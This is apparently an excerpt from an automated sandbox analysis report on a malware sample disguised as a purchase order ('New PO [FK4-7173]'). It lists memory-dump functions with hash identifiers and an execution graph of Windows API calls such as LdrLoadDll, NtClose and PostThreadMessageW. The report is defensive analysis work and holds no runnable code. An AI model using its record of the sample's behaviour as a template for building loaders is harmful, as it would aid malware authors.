                                                                          • Opcode Fuzzy Hash: 384088f9fc1ef3ee43f9d6a1729ebaa397ee4fd9d68975cbd7e886348b365150
                                                                          • Instruction Fuzzy Hash: 2CE10574E041199FCB14DFA8C5909AEFBF2FF89304F248169D419AB35AD730A946CF61
                                                                          Function 05138148 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eaf67034766003572c317b16c31a2b64397df2cf5e04db45e9f65c4b1f5e7ef1
                                                                          • Instruction ID: 965aafd4035974c27beb2a891c49d3453263c36daef4ada4829aae87f2220ead
                                                                          • Opcode Fuzzy Hash: eaf67034766003572c317b16c31a2b64397df2cf5e04db45e9f65c4b1f5e7ef1
                                                                          • Instruction Fuzzy Hash: 6BE11674E051199FCB14DFA8C5A19AEFBF2FF88304F248169E414AB356D730A946CFA1
                                                                          Function 051369B8 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e709ced4ae7e71c2de624cfc6a69c59ba00b03fa14f3366851de050ff0bd0a6
                                                                          • Instruction ID: 66ea18e32ab331730fa222c969a17d0e236948c0975f6c8283fc568095f1f37f
                                                                          • Opcode Fuzzy Hash: 4e709ced4ae7e71c2de624cfc6a69c59ba00b03fa14f3366851de050ff0bd0a6
                                                                          • Instruction Fuzzy Hash: 17E1F474E041199FCB14DFA9C9919AEFBF2BF88304F24816AD414AB359D730A946CF61
                                                                          Function 0705E310 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 14c738c2872ac69046f4d8d134f30cabfff5763e3e226599769013fdf30e1e0f
                                                                          • Instruction ID: a7de617af0be9cd9d27b1a92acf67cc9ac2d1d8a421a33f159f04b902a345eb6
                                                                          • Opcode Fuzzy Hash: 14c738c2872ac69046f4d8d134f30cabfff5763e3e226599769013fdf30e1e0f
                                                                          • Instruction Fuzzy Hash: 21E10AB4E102198FCB14DFA9C5809AEFBF2FF89304F648269D854AB355D734A942CF61
                                                                          Function 0705F8EF Relevance: .3, Instructions: 273COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b54c574585f553e8781628df89fd5dff7bab7d9ff986115a5baffa1a56889313
                                                                          • Instruction ID: f3487f98e1bd6e8bc9f31d5f45a51086fe96283dbe71600667b0ecf5c9e53da2
                                                                          • Opcode Fuzzy Hash: b54c574585f553e8781628df89fd5dff7bab7d9ff986115a5baffa1a56889313
                                                                          • Instruction Fuzzy Hash: 7AD14934D10B1ACACB01EBA8D950AD9F771FF95300F20C79AE50977225EB706AC9CB91
                                                                          Function 04B402BC Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b66ec0e807dcb16e35e67110bb2e624e5f339aee40a150d85344125b1789bf21
                                                                          • Instruction ID: e62ee689c1a6a13469071236af5dcc4c8655d0f954260683cc5b8468a4cd3f8a
                                                                          • Opcode Fuzzy Hash: b66ec0e807dcb16e35e67110bb2e624e5f339aee40a150d85344125b1789bf21
                                                                          • Instruction Fuzzy Hash: 97A19132E00209CFCF05DFB4C84459EBBB2FFC9304B1545AAE905AB265DB31E956DB50
                                                                          Function 0705F900 Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fcfb2f11d1ae999fdfca27479d1067c5ad855fddffa020887fab1bf1c1608a3
                                                                          • Instruction ID: ce51868660b544bba590f851dd47c11179404bb10e1537fea9674876511e2824
                                                                          • Opcode Fuzzy Hash: 3fcfb2f11d1ae999fdfca27479d1067c5ad855fddffa020887fab1bf1c1608a3
                                                                          • Instruction Fuzzy Hash: 04D12735D10B1ACACB01EBA8D950A9DF771FF95300F20C79AE50977225EB706AC9CB91
                                                                          Function 04B42209 Relevance: .2, Instructions: 248COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fbbb677ef34bfc0166061f74e8853cc593fba902cfc5558c2a1940a51c26d898
                                                                          • Instruction ID: 40a4d8ea4865ad4b6e23b05272cd8a7e5858909971bc3711f7d65f09b68b0cfc
                                                                          • Opcode Fuzzy Hash: fbbb677ef34bfc0166061f74e8853cc593fba902cfc5558c2a1940a51c26d898
                                                                          • Instruction Fuzzy Hash: 38D115F4C01746ABE714CF69E8481897BB1FBA5328B50820DDD616B2E5DBBC284BCF44
                                                                          Function 05136570 Relevance: .1, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8c90609f099a7fab061b986b404000e36da2620d9a817c66daf3e73167af4831
                                                                          • Instruction ID: dd7dda3a8dbc6809a89f33f31193f0179ec506c35a816c05b54f7cb3bcad0808
                                                                          • Opcode Fuzzy Hash: 8c90609f099a7fab061b986b404000e36da2620d9a817c66daf3e73167af4831
                                                                          • Instruction Fuzzy Hash: 46514C74E042198FCB14DFA9C9919AEFBF2BF89304F24C16AD418AB316D7309942CF61
                                                                          Function 0513A5C4 Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69aeaf989e887548e15be1966eccdd490a96c4a19745f5993b4d0d6f14de33d4
                                                                          • Instruction ID: b3e5e1637ab167db71a278041345050c5d6e2169175277167a0030c34bc7d362
                                                                          • Opcode Fuzzy Hash: 69aeaf989e887548e15be1966eccdd490a96c4a19745f5993b4d0d6f14de33d4
                                                                          • Instruction Fuzzy Hash: C3F01738948108CFCB649F94D8695F8B779FF4B321F0122F6D95E97252E72A5A118B10
                                                                          Function 0513A9E5 Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ee8371be450ace12f62387bdd549141391e7844570a9e14c7f8349c72aa9900
                                                                          • Instruction ID: 2574643674211f51d90c69c3cde2ac64c5b79f6d106a89425dd8f3672d5aa5d4
                                                                          • Opcode Fuzzy Hash: 3ee8371be450ace12f62387bdd549141391e7844570a9e14c7f8349c72aa9900
                                                                          • Instruction Fuzzy Hash: A3E0927CD0C188CFC725DB60AC641F9BB7AEF0B112F0520E5C54D93102D32859108710
                                                                          Function 04B72648 Relevance: 41.7, Strings: 33, Instructions: 440COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
                                                                          • API String ID: 0-2965632952
                                                                          • Opcode ID: 885d677b09f0dec1605f73a5e7841c31737b5b2931a52355979cb37dd6bb15c2
                                                                          • Instruction ID: c65e57c5e644c259dee3b803a52b992dd8b4a3b6b93e2b66fc11540e0cd4b7c7
                                                                          • Opcode Fuzzy Hash: 885d677b09f0dec1605f73a5e7841c31737b5b2931a52355979cb37dd6bb15c2
                                                                          • Instruction Fuzzy Hash: 65126370A0021A8FDB09EF78E950B9D7B72FF90305F60866DE405AB265DB346D4ACF85
                                                                          Function 04B72658 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
                                                                          • API String ID: 0-2965632952
                                                                          • Opcode ID: 690a0831b0b765dea084c07b19a7423391782ad2ab84e5c855ef52b60ff24907
                                                                          • Instruction ID: ad501ba9222acb24cbde64eb56d656b92d3fe1e8184f65ce1f606e871f1f94cc
                                                                          • Opcode Fuzzy Hash: 690a0831b0b765dea084c07b19a7423391782ad2ab84e5c855ef52b60ff24907
                                                                          • Instruction Fuzzy Hash: D0126370A0021A8FDB09EF78E950B9D7B72FF90305F60866DE405AB265DB346D4ACF85
                                                                          Function 0705A5A8 Relevance: 5.2, Strings: 4, Instructions: 176COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'cq$Hgq$$cq$$cq
                                                                          • API String ID: 0-2640332919
                                                                          • Opcode ID: 349faf7c4b5efb3e2d2ea2c7b4def6192ffdf91dc7b713e4fc861d805f92dc0e
                                                                          • Instruction ID: f9cf0400a246b0a9190198f7cdbfaaf0f1de7a70013faec730ee5544c5aebcdb
                                                                          • Opcode Fuzzy Hash: 349faf7c4b5efb3e2d2ea2c7b4def6192ffdf91dc7b713e4fc861d805f92dc0e
                                                                          • Instruction Fuzzy Hash: 4551A3F97001568FDB59AA39592427F2EE7AFC56417198729DC03CB3D1DF28CC0287A2
                                                                          Function 07055048 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \;cq$\;cq$\;cq$\;cq
                                                                          • API String ID: 0-2961067002
                                                                          • Opcode ID: 433e2a0a723ae4c4c0c5f1dd4eb6a749d32e0ca032117cdd9bd974735e0614ca
                                                                          • Instruction ID: 446a3f7d39d6e226216a525e6e6d0cbcca8f1b6663d2dd7c9bd885d6630b87ce
                                                                          • Opcode Fuzzy Hash: 433e2a0a723ae4c4c0c5f1dd4eb6a749d32e0ca032117cdd9bd974735e0614ca
                                                                          • Instruction Fuzzy Hash: CA0184B17101168FCB649E2DC84092B77E7AFC96607255269E912CB3A0FB71DC6187D1

                                                                          Execution Graph

                                                                          Execution Coverage:1.2%
                                                                          Dynamic/Decrypted Code Coverage:5.1%
                                                                          Signature Coverage:8%
                                                                          Total number of Nodes:137
                                                                          Total number of Limit Nodes:9
                                                                          execution_graph 94910 425003 94914 42501c 94910->94914 94911 425067 94918 42e953 94911->94918 94914->94911 94915 4250a7 94914->94915 94917 4250ac 94914->94917 94916 42e953 RtlFreeHeap 94915->94916 94916->94917 94921 42cc43 94918->94921 94920 425077 94922 42cc60 94921->94922 94923 42cc71 RtlFreeHeap 94922->94923 94923->94920 94924 42bec3 94925 42bedd 94924->94925 94928 1172df0 LdrInitializeThunk 94925->94928 94926 42bf05 94928->94926 95046 424c73 95047 424c8f 95046->95047 95048 424cb7 95047->95048 95049 424ccb 95047->95049 95050 42c8c3 NtClose 95048->95050 95051 42c8c3 NtClose 95049->95051 95052 424cc0 95050->95052 95053 424cd4 95051->95053 95056 42ea73 RtlAllocateHeap 95053->95056 95055 424cdf 95056->95055 95057 42f9f3 95058 42fa03 95057->95058 95059 42fa09 95057->95059 95060 42ea33 RtlAllocateHeap 95059->95060 95061 42fa2f 95060->95061 94929 413d83 94932 42cb53 94929->94932 94933 42cb6d 94932->94933 94936 1172c70 LdrInitializeThunk 94933->94936 94934 413da5 94936->94934 94937 41e783 94938 41e7a9 94937->94938 94942 41e8a0 94938->94942 94943 42fb23 94938->94943 94940 41e83e 94940->94942 94949 42bf13 94940->94949 94944 42fa93 94943->94944 94947 42faf0 94944->94947 94953 42ea33 94944->94953 94946 42facd 94948 42e953 RtlFreeHeap 94946->94948 94947->94940 94948->94947 94950 42bf30 94949->94950 94959 1172c0a 94950->94959 94951 42bf5c 94951->94942 94956 42cbf3 94953->94956 94955 42ea4e 94955->94946 94957 42cc10 94956->94957 94958 42cc21 RtlAllocateHeap 94957->94958 94958->94955 94960 1172c11 94959->94960 94961 1172c1f LdrInitializeThunk 94959->94961 94960->94951 94961->94951 95062 41b573 95063 41b5b7 95062->95063 95064 41b5d8 95063->95064 95065 42c8c3 NtClose 95063->95065 95065->95064 95066 4142f3 95067 414308 95066->95067 95072 417a53 95067->95072 95069 41432b 95070 41436e 95069->95070 95071 41435f PostThreadMessageW 95069->95071 95071->95070 95073 417a77 95072->95073 95074 417ab3 LdrLoadDll 95073->95074 95075 417a7e 95073->95075 95074->95075 95075->95069 94962 414384 94963 414360 94962->94963 94966 41438c 94962->94966 94964 414362 PostThreadMessageW 94963->94964 94965 41436e 94963->94965 94964->94965 94967 401ac6 94968 401b01 94967->94968 94971 42fec3 94968->94971 94974 42e503 94971->94974 94975 42e529 94974->94975 94986 4074b3 94975->94986 94977 42e53f 94978 401bee 94977->94978 94989 41b383 94977->94989 94980 42e55e 94981 42e573 94980->94981 95004 42cc93 94980->95004 95000 428593 94981->95000 94984 42e58d 94985 42cc93 ExitProcess 94984->94985 94985->94978 95007 416763 94986->95007 94988 4074c0 94988->94977 94990 41b3af 94989->94990 95018 41b273 94990->95018 94993 41b3dc 94997 41b3e7 94993->94997 95024 42c8c3 94993->95024 94994 41b410 94994->94980 94995 41b3f4 94995->94994 94998 42c8c3 NtClose 94995->94998 94997->94980 94999 41b406 94998->94999 94999->94980 95001 4285f4 95000->95001 95003 428601 95001->95003 95032 4188c3 95001->95032 95003->94984 95005 42ccb0 95004->95005 95006 42ccc1 ExitProcess 95005->95006 95006->94981 95008 416780 95007->95008 95010 416799 95008->95010 95011 42d313 95008->95011 95010->94988 95013 42d32d 95011->95013 95012 42d35c 95012->95010 95013->95012 95014 42bf13 LdrInitializeThunk 95013->95014 95015 42d3b9 95014->95015 95016 42e953 RtlFreeHeap 95015->95016 95017 42d3d2 95016->95017 95017->95010 95019 41b28d 95018->95019 95023 41b369 95018->95023 95027 42bfb3 95019->95027 95022 42c8c3 NtClose 95022->95023 95023->94993 95023->94995 95025 42c8dd 95024->95025 95026 42c8ee NtClose 95025->95026 95026->94997 95028 42bfd0 95027->95028 95031 11735c0 LdrInitializeThunk 95028->95031 95029 41b35d 95029->95022 95031->95029 95034 4188ed 95032->95034 95033 418dfb 95033->95003 95034->95033 95040 413f63 95034->95040 95036 418a1a 95036->95033 95037 42e953 RtlFreeHeap 95036->95037 95038 418a32 95037->95038 95038->95033 95039 42cc93 ExitProcess 95038->95039 95039->95033 95044 413f83 95040->95044 95042 413fec 95042->95036 95043 413fe2 95043->95036 95044->95042 95045 41b693 RtlFreeHeap LdrInitializeThunk 95044->95045 95045->95043 95076 1172b60 LdrInitializeThunk 95077 419018 95078 419022 95077->95078 95079 42c8c3 NtClose 95077->95079 95079->95078

                                                                          Executed Functions

                                                                          Function 00417A53 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 314 417a53-417a6f 315 417a77-417a7c 314->315 316 417a72 call 42f533 314->316 317 417a82-417a90 call 42fb33 315->317 318 417a7e-417a81 315->318 316->315 321 417aa0-417ab1 call 42dfd3 317->321 322 417a92-417a9d call 42fdd3 317->322 327 417ab3-417ac7 LdrLoadDll 321->327 328 417aca-417acd 321->328 322->321 327->328
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                          • Instruction ID: b2239b5a246aa47b8c580e500f398887a5f8cb7f7b52134d12327bc2a0463733
                                                                          • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                          • Instruction Fuzzy Hash: 60015EB1E4020DBBDF10DAE5DC42FEEB7B89F54308F4041AAE90997240F634EB498B95
                                                                          Function 0042C8C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 339 42c8c3-42c8fc call 404883 call 42daf3 NtClose
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: de377d90884e2a536d1592827abbac62731acb07f9ce7b37f38ee170fb354008
                                                                          • Instruction ID: c2f8565f9014e8f24122bcb7b4e594ba5ae6e23bff17f8d7e91d2768e3244e47
                                                                          • Opcode Fuzzy Hash: de377d90884e2a536d1592827abbac62731acb07f9ce7b37f38ee170fb354008
                                                                          • Instruction Fuzzy Hash: 61E086762002547BC610FA5ADC41FD7775CEFC5764F408459FA0867142C6B5790187F4
                                                                          Function 01172B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
                                                                          • Instruction ID: d9fdf5ad7e9440e9388ffef92a35ea2c03a56d9344a9d17c3742ebba62664d25
                                                                          • Opcode Fuzzy Hash: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
                                                                          • Instruction Fuzzy Hash: 5D90026120240003410971584554616900B97E0301B95C021E1015594DC62589916625
                                                                          Function 01172DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
                                                                          • Instruction ID: 63756e7fd5da4fd36a3f1182157030af8d747adf4f309803bfa934bb0df512fc
                                                                          • Opcode Fuzzy Hash: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
                                                                          • Instruction Fuzzy Hash: B390023120140413D11571584644707500A97D0341FD5C412A042555CDD7568A52A621
                                                                          Function 01172C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
                                                                          • Instruction ID: 12584dcfc6e0ebf2ec5221abe288403f392952b7b3806c6cd67449f86981811b
                                                                          • Opcode Fuzzy Hash: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
                                                                          • Instruction Fuzzy Hash: C790023120148802D1147158854474A500697D0301F99C411A442565CDC79589917621
                                                                          Function 011735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ed6318108bea49f66465e2b3bad4e036d5011da3cec79e6d56d33c2bb0003c88
                                                                          • Instruction ID: 4906bf1bc05195010159c2c7849f14b1f4edd5181bee2e47cd6cbabfdcd530a4
                                                                          • Opcode Fuzzy Hash: ed6318108bea49f66465e2b3bad4e036d5011da3cec79e6d56d33c2bb0003c88
                                                                          • Instruction Fuzzy Hash: 9390023160550402D10471584654706600697D0301FA5C411A042556CDC7958A516AA2
                                                                          Function 00414281 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399
                                                                          • Opcode ID: 2ffb905ad01c87147c95e9934b5be479231635cb71298ad9cba1a69cd54bee29
                                                                          • Instruction ID: 9fe51675ca146104616795f4b640ecc926033a72af3bea4d0732761d9cb4de32
                                                                          • Opcode Fuzzy Hash: 2ffb905ad01c87147c95e9934b5be479231635cb71298ad9cba1a69cd54bee29
                                                                          • Instruction Fuzzy Hash: DB112773E0411C7ADF01DBA1AC81DEEBB3CEF81358B84816AF95467242CB784E0387A5
                                                                          Function 004142E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399
                                                                          • Opcode ID: efced6d65cbd8b8b05f43dfee51e676b8f1cbf92258e52e4b22dd1e53515cb5e
                                                                          • Instruction ID: 43babd9aa450d8a225b0bfffbe2e173e975652710e12d329b5d1f1b8577d3324
                                                                          • Opcode Fuzzy Hash: efced6d65cbd8b8b05f43dfee51e676b8f1cbf92258e52e4b22dd1e53515cb5e
                                                                          • Instruction Fuzzy Hash: 5F11CA72E0015C7ADB11A6E19C81DEFBB7C9F81798F04815AFA5467141D6784E0687A1
                                                                          Function 004142F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399
                                                                          • Opcode ID: bb44aa9373c81bcec454be90ec59d28ebd7b8fc1fcb53dc049938cfd57ccae43
                                                                          • Instruction ID: 72c7d482b33c3bdae6cc654c8b70a46624586fb03e95c85952d4c01347f18a37
                                                                          • Opcode Fuzzy Hash: bb44aa9373c81bcec454be90ec59d28ebd7b8fc1fcb53dc049938cfd57ccae43
